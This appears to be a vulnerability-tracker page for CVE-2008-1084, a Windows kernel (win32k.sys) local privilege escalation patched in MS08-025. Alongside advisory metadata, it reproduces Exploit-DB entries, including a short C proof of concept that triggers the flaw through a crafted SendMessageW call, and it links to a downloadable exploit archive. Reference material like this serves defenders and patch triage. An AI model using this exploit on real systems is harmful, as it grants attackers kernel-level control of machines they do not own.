CVE-2008-1084
published 2008-04-08CVE-2008-1084: Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users…
PriorityP344high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
6.75%
93.2th percentile
Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-x7p2-h34x-gw97: win32k
ghsa_unreviewed·2022-05-17·CVSS 7.2
CVE-2008-6819 [HIGH] CWE-362 GHSA-x7p2-h34x-gw97: win32k
win32k.sys in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (system crash) via vectors related to CreateWindow, TranslateMessage, and DispatchMessage, possibly a race condition between threads, a different vulnerability than CVE-2008-1084. NOTE: some of these details are obtained from third party information.
GHSA
GHSA-6628-6x4p-hh34: Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows loca
ghsa_unreviewed·2022-05-01
CVE-2008-1084 [HIGH] CWE-94 GHSA-6628-6x4p-hh34: Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows loca
Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys.
No detection rules found.
Exploit-DB
Microsoft Windows XP SP2 - 'win32k.sys' Local Privilege Escalation (MS08-025)
exploitdb·2008-04-28
CVE-2008-1084 Microsoft Windows XP SP2 - 'win32k.sys' Local Privilege Escalation (MS08-025)
Microsoft Windows XP SP2 - 'win32k.sys' Local Privilege Escalation (MS08-025)
---
// ms08-25-exploit #1
// This exploit takes advantage of one of the vulnerabilities
// patched in the Microsoft Security bulletin MS08-25
// http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx
// ---------------------------------------
// Modifications are strictly prohibited.
// For research purposes ONLY.
// ---------------------------------------
// Ruben Santamarta
// www.reversemode.com
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5518.zip (2008-ms08-25-exploit.zip)
# milw0rm.com [2008-04-28]
Exploit-DB
Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)
exploitdb·2008-04-08
CVE-2008-1084 Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)
Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)
---
/*
source: https://www.securityfocus.com/bid/28554/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system.
*/
#include
#include
int main(int argc,char *argv[])
{
DWORD dwHookAddress = 0x80000000;
printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" );
printf( "Create by Whitecell's [email protected] 2008/04/10\n" );
SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );
return 0;
}
http://marc.info/?l=bugtraq&m=120845064910729&w=2http://milw0rm.com/sploits/2008-ms08-25-exploit.ziphttp://secunia.com/advisories/29720http://www.securityfocus.com/bid/28554http://www.securitytracker.com/id?1019803http://www.us-cert.gov/cas/techalerts/TA08-099A.htmlhttp://www.vupen.com/english/advisories/2008/1149/referenceshttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-025https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5437https://www.exploit-db.com/exploits/5518http://marc.info/?l=bugtraq&m=120845064910729&w=2http://milw0rm.com/sploits/2008-ms08-25-exploit.ziphttp://secunia.com/advisories/29720http://www.securityfocus.com/bid/28554http://www.securitytracker.com/id?1019803http://www.us-cert.gov/cas/techalerts/TA08-099A.htmlhttp://www.vupen.com/english/advisories/2008/1149/referenceshttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-025https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5437https://www.exploit-db.com/exploits/5518
2008-04-08
Published